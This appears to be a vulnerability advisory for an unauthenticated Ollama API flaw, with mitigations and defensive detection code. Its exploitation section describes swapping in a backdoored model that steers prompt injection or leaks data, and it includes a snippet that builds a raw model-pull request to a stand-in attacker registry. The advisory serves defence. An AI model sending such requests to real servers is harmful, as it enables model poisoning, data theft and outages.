CVE-2025-63389

CRITICAL
Published December 18, 2025
CISO Take

Ollama instances exposed on any network interface — including internal networks and cloud VMs — can be fully compromised by a single unauthenticated HTTP call. An attacker can pull, delete, or replace your production LLM models without leaving traditional credentials-based IOCs. Immediately firewall Ollama to localhost-only and verify no running instance is reachable beyond 127.0.0.1:11434; treat any internet-exposed Ollama as a confirmed incident.
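The reachability check urged above can be scripted for quick triage. This is an illustrative sketch, not a definitive scanner: the host list is a hypothetical example, and only TCP reachability of the default port 11434 is tested.

```python
import socket

def ollama_port_open(host, port=11434, timeout=2.0):
    """Return True if the given host accepts TCP connections on
    Ollama's default API port; False on refusal or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Triage example: anything reachable beyond loopback warrants escalation.
# "10.0.0.5" is a placeholder for hosts in your own inventory.
for host in ("127.0.0.1", "10.0.0.5"):
    status = "REACHABLE" if ollama_port_open(host) else "closed/filtered"
    print(f"{host}:11434 -> {status}")
```

A positive result on a non-loopback interface means the full unauthenticated API is exposed, since Ollama applies no authentication layer behind the port.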

Affected Systems

Package   Ecosystem   Vulnerable Range   Patched
ollama    pip         <= v0.12.3         No patch

Do you use ollama? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. PATCH: Upgrade Ollama to a version beyond v0.12.3 when available; monitor the official GitHub releases actively.
  2. ISOLATE IMMEDIATELY: Ensure Ollama binds only to 127.0.0.1 — set OLLAMA_HOST=127.0.0.1 in the service environment before restarting.
  3. FIREWALL: Block TCP/11434 at the host firewall level (iptables/nftables/security groups) — do not rely on application-level binding alone.
  4. REVERSE PROXY WITH AUTH: Place an authenticated reverse proxy (nginx/Caddy with basic auth or mTLS) in front of any Ollama instance that must be network-accessible.
  5. AUDIT: Run `ollama list` and cross-reference model hashes against known-good pull manifests; any unexpected model is a potential IOC.
  6. DETECT: Alert on unexpected HTTP POST to /api/pull, /api/delete, or /api/copy from any source other than localhost in network logs or WAF rules.
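The detection step above can be sketched as a simple log filter. This assumes a combined-log-style access log (source IP first, quoted request line); adapt the regex to your proxy or WAF log format, and note the sample lines here are invented for illustration.

```python
import re

# Model-management endpoints called out in the detection guidance.
SENSITIVE = ("/api/pull", "/api/delete", "/api/copy")
LOCALHOST = ("127.0.0.1", "::1")

# Assumes lines shaped like: '<src_ip> ... "<METHOD> <path> ..." ...'
LINE_RE = re.compile(r'^(?P<src>\S+) .*"(?P<method>[A-Z]+) (?P<path>\S+)')

def suspicious(line):
    """Flag model-management POSTs that did not originate from loopback."""
    m = LINE_RE.match(line)
    if not m:
        return False
    return (m.group("method") == "POST"
            and m.group("path").startswith(SENSITIVE)
            and m.group("src") not in LOCALHOST)

logs = [
    '127.0.0.1 - - [18/Dec/2025] "POST /api/pull HTTP/1.1" 200',    # local, benign
    '203.0.113.7 - - [18/Dec/2025] "POST /api/pull HTTP/1.1" 200',  # remote: alert
    '203.0.113.7 - - [18/Dec/2025] "GET /api/tags HTTP/1.1" 200',   # read-only
]
alerts = [line for line in logs if suspicious(line)]
print(alerts)  # only the remote POST /api/pull line
```

In production this logic would live in a SIEM rule rather than a script, but the predicate — sensitive path, POST method, non-loopback source — is the same.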

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.2 - AI System Security — Access Control and Authentication
A.6.2.6 - Access control to AI systems
A.9.3 - AI system security and integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI risk
MANAGE 2.2 - Mechanisms to sustain the value of deployed AI systems
MANAGE 4.1 - Post-deployment AI risk monitoring and incident response
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities
LLM10:2025 - Model Theft

Technical Details

NVD Description

A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.

Exploitation Scenario

An attacker performs an internet-wide scan for port 11434 or targets a known enterprise IP range. Upon finding an exposed Ollama instance, they issue a POST /api/pull with a payload pointing to an attacker-controlled registry hosting a backdoored GGUF model that mimics llama3 or mistral. The legitimate model is silently overwritten. Subsequent LLM queries from the enterprise's internal tools — RAG pipelines, code assistants, chatbots — now interact with the poisoned model, which is capable of prompt injection steering, data exfiltration via crafted responses, or jailbreak facilitation. Alternatively, the attacker deletes all loaded models via POST /api/delete, causing immediate denial of service to all AI-dependent workflows with no authentication trail in any SIEM.
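The pull-overwrite step in this scenario can be made concrete by constructing the request an attacker would send. The registry hostname and model tag below are invented for illustration, and the JSON body shape follows Ollama's pull API as commonly documented (a model reference, plus an "insecure" flag to skip TLS checks against a rogue registry) — treat the exact field names as an assumption to verify against your deployed version.

```python
import json

# Hypothetical attacker-controlled registry and model tag.
payload = {
    "model": "registry.attacker.example/library/llama3:latest",
    "insecure": True,  # skip TLS verification against the rogue registry
}
body = json.dumps(payload).encode()

# The raw request: no credentials, no token, no session. Combined with
# /api/copy, the staged model can replace the legitimate "llama3" name.
request = (
    b"POST /api/pull HTTP/1.1\r\n"
    b"Host: victim.example:11434\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"\r\n" + body
)
print(request.decode())
```

The point of the illustration is the absence of any authentication header: on an exposed instance, this single POST is sufficient.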

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
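For readers unfamiliar with the vector notation, it decomposes into metric:value pairs after the version prefix; a minimal parse makes the 9.8 score legible:

```python
vector = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"

# Split off the "CVSS:3.1" version prefix, then read metric:value pairs.
version, *pairs = vector.split("/")
metrics = dict(p.split(":") for p in pairs)
print(metrics)
# AV:N network-reachable, AC:L low complexity, PR:N no privileges,
# UI:N no user interaction, C/I/A all High — the profile behind 9.8.
```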

Timeline

Published
December 18, 2025
Last Modified
January 22, 2026
First Seen
December 18, 2025